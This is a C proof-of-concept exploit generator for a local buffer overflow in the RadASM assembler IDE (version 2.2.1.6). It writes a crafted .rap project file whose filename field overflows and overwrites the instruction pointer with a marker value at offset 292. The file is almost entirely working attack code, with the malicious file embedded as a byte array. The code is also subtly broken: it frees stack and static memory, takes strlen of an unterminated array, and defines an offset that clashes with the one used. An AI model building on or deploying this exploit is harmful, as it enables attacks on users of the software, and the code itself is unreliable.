/*Radasm .rap file local buffer overflow POC
 I'll be back in a few hours with the exploit.
 The vuln is in the filename field.
 snip
 [Files]...1=AVP OVERFLOW...
 snip
*/
#include<stdio.h>
void gen_random(char*,const int);
void print(char*);
unsigned int getFsize(FILE*,char*);
void buildfile(char*);
#define VULNF           "qq.rap"
#define VER             "2.2.1.6"
#define POCNAME         "Radasm .rap file local buffer overflow POC"
#define AUTHOR          "fl0 fl0w"
#define IF(x,NULL)      if(x==NULL)
#define FOR(i,a,b)      for(i=a;i<b;++i)
#define EIPOFFSET       0xDD
#define NUL             '\0'
#define CLEAR(x)        free(x)
    char file[]={ //1534 bytes
    0x5B, 0x50, 0x72, 0x6F, 0x6A, 0x65, 0x63, 0x74, 0x5D, 0x0D, 0x0D, 0x0A, 0x41, 0x73, 0x73, 0x65,
    0x6D, 0x62, 0x6C, 0x65, 0x72, 0x3D, 0x6D, 0x61, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F,
    0x75, 0x70, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x45, 0x78, 0x70, 0x61,
    0x6E, 0x64, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x5B, 0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D,
    0x0A, 0x31, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F, 0x76, 0x65, 0x72, 0x66, 0x72, 0x41, 0x51, 0x42,
    0x63, 0x38, 0x57, 0x73, 0x61, 0x31, 0x78, 0x56, 0x50, 0x66, 0x76, 0x4A, 0x63, 0x72, 0x67, 0x52,
    0x59, 0x77, 0x54, 0x69, 0x69, 0x7A, 0x73, 0x32, 0x74, 0x72, 0x51, 0x46, 0x36, 0x39, 0x41, 0x7A,
    0x42, 0x6C, 0x61, 0x78, 0x33, 0x43, 0x46, 0x33, 0x45, 0x44, 0x4E, 0x68, 0x6D, 0x33, 0x73, 0x6F,
    0x4C, 0x42, 0x50, 0x68, 0x37, 0x31, 0x59, 0x65, 0x78, 0x75, 0x69, 0x65, 0x61, 0x6F, 0x45, 0x69,
    0x49, 0x67, 0x78, 0x49, 0x58, 0x34, 0x61, 0x32, 0x64, 0x52, 0x45, 0x62, 0x62, 0x53, 0x71, 0x57,
    0x79, 0x36, 0x79, 0x68, 0x4B, 0x49, 0x44, 0x43, 0x64, 0x4A, 0x4F, 0x79, 0x61, 0x70, 0x6E, 0x78,
    0x72, 0x70, 0x4D, 0x43, 0x41, 0x52, 0x43, 0x72, 0x34, 0x7A, 0x64, 0x47, 0x63, 0x38, 0x31, 0x74,
    0x42, 0x44, 0x4B, 0x73, 0x4D, 0x6C, 0x61, 0x5A, 0x54, 0x58, 0x43, 0x31, 0x4F, 0x38, 0x59, 0x46,
    0x4F, 0x47, 0x4B, 0x6A, 0x78, 0x52, 0x72, 0x4A, 0x42, 0x64, 0x54, 0x33, 0x68, 0x56, 0x4F, 0x66,
    0x6F, 0x61, 0x4D, 0x65, 0x41, 0x6A, 0x53, 0x57, 0x66, 0x63, 0x68, 0x6F, 0x5A, 0x59, 0x46, 0x59,
    0x5A, 0x35, 0x42, 0x36, 0x6B, 0x7A, 0x4D, 0x43, 0x6B, 0x38, 0x52, 0x36, 0x42, 0x45, 0x75, 0x5A,
    0x4D, 0x72, 0x46, 0x36, 0x63, 0x49, 0x36, 0x4E, 0x58, 0x38, 0x44, 0x59, 0x64, 0x44, 0x33, 0x6F,
    0x6A, 0x78, 0x53, 0x6E, 0x71, 0x50, 0x54, 0x47, 0x66, 0x52, 0x79, 0x69, 0x6C, 0x4F, 0x59, 0x47,
    0x78, 0x6C, 0x53, 0x58, 0x50, 0x74, 0x4C, 0x4A, 0x62, 0x6F, 0x48, 0x38, 0x53, 0x34, 0x6B, 0x77,
    0x49, 0x67, 0x54, 0x78, 0x42, 0x42, 0x42, 0x42, 0x41, 0x41, 0x41, 0x41, 0x7A, 0x4F, 0x4C, 0x4D,
    0x72, 0x62, 0x41, 0x79, 0x66, 0x4B, 0x55, 0x55, 0x54, 0x73, 0x47, 0x43, 0x6F, 0x52, 0x62, 0x6C,
    0x73, 0x61, 0x71, 0x76, 0x36, 0x55, 0x70, 0x64, 0x76, 0x4E, 0x49, 0x73, 0x4E, 0x72, 0x6D, 0x77,
    0x55, 0x6C, 0x4E, 0x35, 0x75, 0x39, 0x74, 0x33, 0x74, 0x67, 0x6A, 0x32, 0x74, 0x75, 0x73, 0x5A,
    0x42, 0x61, 0x75, 0x46, 0x6B, 0x72, 0x46, 0x43, 0x4A, 0x43, 0x6D, 0x5A, 0x46, 0x4F, 0x76, 0x31,
    0x51, 0x44, 0x49, 0x49, 0x58, 0x4A, 0x4E, 0x5A, 0x49, 0x39, 0x35, 0x68, 0x46, 0x51, 0x72, 0x37,
    0x37, 0x42, 0x49, 0x45, 0x6C, 0x79, 0x63, 0x74, 0x34, 0x41, 0x6A, 0x36, 0x50, 0x4B, 0x6E, 0x5A,
    0x70, 0x7A, 0x52, 0x69, 0x4B, 0x59, 0x70, 0x5A, 0x67, 0x6E, 0x53, 0x4F, 0x4B, 0x6C, 0x71, 0x38,
    0x41, 0x7A, 0x72, 0x48, 0x71, 0x44, 0x6F, 0x47, 0x4C, 0x34, 0x52, 0x48, 0x79, 0x71, 0x79, 0x58,
    0x33, 0x67, 0x35, 0x41, 0x79, 0x79, 0x36, 0x31, 0x6C, 0x65, 0x44, 0x59, 0x54, 0x33, 0x43, 0x45,
    0x57, 0x38, 0x4B, 0x36, 0x39, 0x72, 0x6B, 0x6C, 0x50, 0x47, 0x74, 0x66, 0x55, 0x52, 0x32, 0x49,
    0x5A, 0x32, 0x6D, 0x42, 0x31, 0x53, 0x37, 0x4E, 0x4C, 0x74, 0x32, 0x6E, 0x51, 0x66, 0x6A, 0x33,
    0x53, 0x4C, 0x33, 0x58, 0x42, 0x79, 0x49, 0x6D, 0x63, 0x69, 0x51, 0x54, 0x71, 0x56, 0x61, 0x41,
    0x55, 0x6E, 0x4A, 0x76, 0x55, 0x6D, 0x48, 0x56, 0x51, 0x47, 0x73, 0x54, 0x6D, 0x76, 0x48, 0x65,
    0x75, 0x53, 0x45, 0x42, 0x4D, 0x53, 0x50, 0x68, 0x32, 0x51, 0x36, 0x64, 0x51, 0x41, 0x6A, 0x79,
    0x34, 0x4B, 0x6A, 0x73, 0x66, 0x53, 0x58, 0x46, 0x34, 0x59, 0x50, 0x38, 0x61, 0x72, 0x46, 0x33,
    0x53, 0x4C, 0x4C, 0x6E, 0x79, 0x33, 0x30, 0x4B, 0x4B, 0x7A, 0x69, 0x48, 0x74, 0x52, 0x62, 0x4F,
    0x45, 0x32, 0x75, 0x38, 0x71, 0x76, 0x4A, 0x50, 0x33, 0x42, 0x36, 0x55, 0x69, 0x75, 0x31, 0x67,
    0x4A, 0x30, 0x33, 0x4F, 0x68, 0x6D, 0x57, 0x76, 0x6E, 0x37, 0x4D, 0x49, 0x72, 0x39, 0x6F, 0x44,
    0x55, 0x54, 0x4F, 0x58, 0x37, 0x4E, 0x59, 0x45, 0x6B, 0x5A, 0x67, 0x7A, 0x55, 0x6E, 0x79, 0x31,
    0x73, 0x77, 0x4F, 0x62, 0x64, 0x59, 0x53, 0x45, 0x76, 0x57, 0x52, 0x42, 0x4C, 0x7A, 0x5A, 0x30,
    0x32, 0x68, 0x36, 0x37, 0x59, 0x72, 0x6C, 0x76, 0x42, 0x6E, 0x64, 0x6E, 0x34, 0x63, 0x58, 0x50,
    0x61, 0x6F, 0x61, 0x4B, 0x6B, 0x35, 0x6C, 0x51, 0x6E, 0x33, 0x33, 0x68, 0x66, 0x4E, 0x57, 0x50,
    0x67, 0x72, 0x38, 0x38, 0x31, 0x6E, 0x50, 0x37, 0x56, 0x78, 0x45, 0x45, 0x34, 0x46, 0x64, 0x67,
    0x63, 0x4C, 0x39, 0x66, 0x4F, 0x50, 0x79, 0x63, 0x39, 0x38, 0x62, 0x49, 0x38, 0x39, 0x71, 0x54,
    0x50, 0x46, 0x74, 0x79, 0x73, 0x4C, 0x31, 0x51, 0x34, 0x47, 0x54, 0x4F, 0x50, 0x77, 0x44, 0x37,
    0x6B, 0x6B, 0x71, 0x50, 0x71, 0x51, 0x35, 0x50, 0x4E, 0x45, 0x45, 0x66, 0x75, 0x54, 0x6C, 0x43,
    0x48, 0x39, 0x57, 0x70, 0x49, 0x59, 0x61, 0x50, 0x48, 0x57, 0x66, 0x55, 0x54, 0x6A, 0x6C, 0x54,
    0x4F, 0x53, 0x6A, 0x33, 0x69, 0x48, 0x37, 0x4A, 0x54, 0x52, 0x73, 0x62, 0x59, 0x48, 0x31, 0x33,
    0x33, 0x54, 0x79, 0x57, 0x4C, 0x49, 0x42, 0x34, 0x47, 0x33, 0x73, 0x56, 0x30, 0x79, 0x6B, 0x50,
    0x64, 0x73, 0x37, 0x48, 0x58, 0x32, 0x37, 0x4B, 0x62, 0x4E, 0x43, 0x43, 0x79, 0x74, 0x4A, 0x52,
    0x38, 0x43, 0x75, 0x36, 0x58, 0x46, 0x70, 0x74, 0x45, 0x49, 0x50, 0x36, 0x38, 0x76, 0x38, 0x5A,
    0x64, 0x56, 0x36, 0x30, 0x47, 0x58, 0x41, 0x50, 0x5A, 0x48, 0x41, 0x44, 0x32, 0x76, 0x51, 0x6B,
    0x57, 0x72, 0x70, 0x71, 0x69, 0x77, 0x64, 0x6F, 0x33, 0x48, 0x72, 0x64, 0x74, 0x36, 0x7A, 0x33,
    0x6C, 0x53, 0x54, 0x70, 0x67, 0x54, 0x70, 0x52, 0x70, 0x52, 0x56, 0x63, 0x77, 0x6F, 0x36, 0x48,
    0x4D, 0x38, 0x75, 0x41, 0x38, 0x44, 0x39, 0x65, 0x45, 0x34, 0x5A, 0x41, 0x44, 0x74, 0x6D, 0x76,
    0x57, 0x76, 0x4E, 0x32, 0x30, 0x4C, 0x42, 0x48, 0x53, 0x6B, 0x44, 0x36, 0x71, 0x72, 0x37, 0x4A,
    0x31, 0x68, 0x41, 0x6B, 0x54, 0x6B, 0x55, 0x46, 0x76, 0x4D, 0x41, 0x30, 0x4F, 0x53, 0x61, 0x39,
    0x31, 0x65, 0x39, 0x67, 0x71, 0x56, 0x4E, 0x42, 0x65, 0x67, 0x31, 0x30, 0x67, 0x41, 0x49, 0x34,
    0x4F, 0x4D, 0x72, 0x78, 0x46, 0x32, 0x6C, 0x74, 0x52, 0x50, 0x57, 0x61, 0x63, 0x4B, 0x77, 0x68,
    0x7A, 0x51, 0x79, 0x77, 0x38, 0x62, 0x79, 0x78, 0x49, 0x46, 0x77, 0x4F, 0x51, 0x66, 0x78, 0x46,
    0x59, 0x79, 0x30, 0x71, 0x75, 0x75, 0x62, 0x70, 0x43, 0x7A, 0x49, 0x37, 0x31, 0x4D, 0x52, 0x56,
    0x4F, 0x67, 0x44, 0x6B, 0x6F, 0x38, 0x66, 0x6E, 0x50, 0x59, 0x6C, 0x61, 0x70, 0x64, 0x76, 0x78,
    0x6C, 0x55, 0x73, 0x42, 0x48, 0x32, 0x39, 0x43, 0x6D, 0x33, 0x4F, 0x52, 0x59, 0x6B, 0x66, 0x72,
    0x6A, 0x52, 0x5A, 0x44, 0x64, 0x77, 0x36, 0x4C, 0x63, 0x70, 0x58, 0x33, 0x33, 0x65, 0x31, 0x49,
    0x4F, 0x77, 0x57, 0x52, 0x32, 0x75, 0x61, 0x41, 0x74, 0x5A, 0x56, 0x42, 0x35, 0x79, 0x69, 0x39,
    0x69, 0x6A, 0x53, 0x41, 0x6A, 0x42, 0x51, 0x6A, 0x67, 0x6E, 0x5A, 0x53, 0x43, 0x65, 0x38, 0x6E,
    0x50, 0x51, 0x48, 0x6E, 0x70, 0x70, 0x5A, 0x71, 0x74, 0x34, 0x35, 0x36, 0x75, 0x4E, 0x68, 0x61,
    0x41, 0x41, 0x5A, 0x2E, 0x41, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x41, 0x56, 0x50, 0x20,
    0x4F, 0x76, 0x65, 0x72, 0x2E, 0x49, 0x6E, 0x63, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65,
    0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D, 0x0A, 0x30, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F,
    0x76, 0x65, 0x72, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65, 0x44,
    0x65, 0x66, 0x5D, 0x0D, 0x0D, 0x0A, 0x4D, 0x65, 0x6E, 0x75, 0x3D, 0x30, 0x2C, 0x31, 0x2C, 0x31,
    0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30,
    0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x0D, 0x0D, 0x0A, 0x31, 0x3D, 0x34,
    0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x52, 0x43, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x76, 0x2C,
    0x31, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x33, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E,
    0x45, 0x58, 0x45, 0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70,
    0x20, 0x2F, 0x6E, 0x6F, 0x36, 0x43, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22,
    0x2C, 0x32, 0x0D, 0x0D, 0x0A, 0x33, 0x3D, 0x35, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4C, 0x49,
    0x4E, 0x4B, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x53, 0x55, 0x42, 0x53, 0x59, 0x53, 0x54, 0x45,
    0x4D, 0x3A, 0x57, 0x49, 0x4E, 0x44, 0x4F, 0x57, 0x53, 0x20, 0x2F, 0x52, 0x45, 0x4C, 0x45, 0x41,
    0x53, 0x45, 0x20, 0x2F, 0x56, 0x45, 0x52, 0x53, 0x49, 0x4F, 0x4E, 0x3A, 0x34, 0x2E, 0x30, 0x20,
    0x2F, 0x4C, 0x49, 0x42, 0x50, 0x41, 0x54, 0x48, 0x3A, 0x22, 0x24, 0x4C, 0x22, 0x20, 0x2F, 0x4F,
    0x55, 0x54, 0x3A, 0x22, 0x24, 0x35, 0x22, 0x2C, 0x33, 0x0D, 0x0D, 0x0A, 0x34, 0x3D, 0x30, 0x2C,
    0x30, 0x2C, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x35, 0x3D, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x6F, 0x62,
    0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x43, 0x56, 0x54, 0x52, 0x45, 0x53, 0x2E, 0x45, 0x58,
    0x45, 0x2C, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x36, 0x3D, 0x2A,
    0x2E, 0x6F, 0x62, 0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E, 0x45, 0x58, 0x45,
    0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70, 0x20, 0x2F, 0x6E,
    0x6F, 0x6C, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22, 0x2C, 0x2A, 0x2E, 0x61,
    0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x37, 0x3D, 0x30, 0x2C, 0x30, 0x2C, 0x22, 0x24, 0x45, 0x5C, 0x4F,
    0x6C, 0x6C, 0x79, 0x44, 0x62, 0x67, 0x22, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x5B, 0x47, 0x72, 0x6F,
    0x75, 0x70, 0x5D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x3D, 0x41, 0x64, 0x64, 0x65,
    0x64, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x73, 0x2C, 0x41, 0x73, 0x73, 0x65, 0x6D, 0x62, 0x6C, 0x79,
    0x2C, 0x52, 0x65, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x73, 0x2C, 0x4D, 0x69, 0x73, 0x63, 0x2C,
    0x4D, 0x6F, 0x64, 0x75, 0x6C, 0x65, 0x73, 0x0D, 0x0A, 0x31, 0x3D, 0x31, 0x0D, 0x0A,};
 int main(){
     printf("[!]%s\n[!]%s\n[!]By %s\n",POCNAME,VER,AUTHOR);
     buildfile(VULNF);
     print("DONE!");
      getchar();
      return 0;
     }
  void buildfile(char* fname){
    char buffer[100000];
    char eip[]="\x55\x55\x55\x55"; //offset=292
       gen_random(buffer,5000);
       memcpy(buffer,file,strlen(file));
       memcpy(buffer+292,eip,4);
       FILE* f=fopen(fname,"wb");
       if(f){
           fwrite(buffer,1,1534,f);
            fclose(f);
             }
          else {
             print("Error in writing file");
              exit(0);
               }
           free(buffer);
           free(file);
         int sz=getFsize(f,fname);
       printf("[!]File is %d bytes\n",sz);
       }
  unsigned int getFsize(FILE* g,char* gname)
    {
             unsigned int s;

             g=fopen(gname,"rb");

             IF(g,NULL)
             {
             print("File error at reading");
             exit(0);
             }
             fseek(g,0,SEEK_END);
             s=ftell(g);

             return s;
    }
      void print(char* msg)
    {
       printf("[*]%s\n",msg);
    }
    void gen_random(char *s, const int len)
    { int i; //helps u find the offsets
      static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

      FOR(i,0,len)
      {
        s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
      }
       s[len]=0;
      }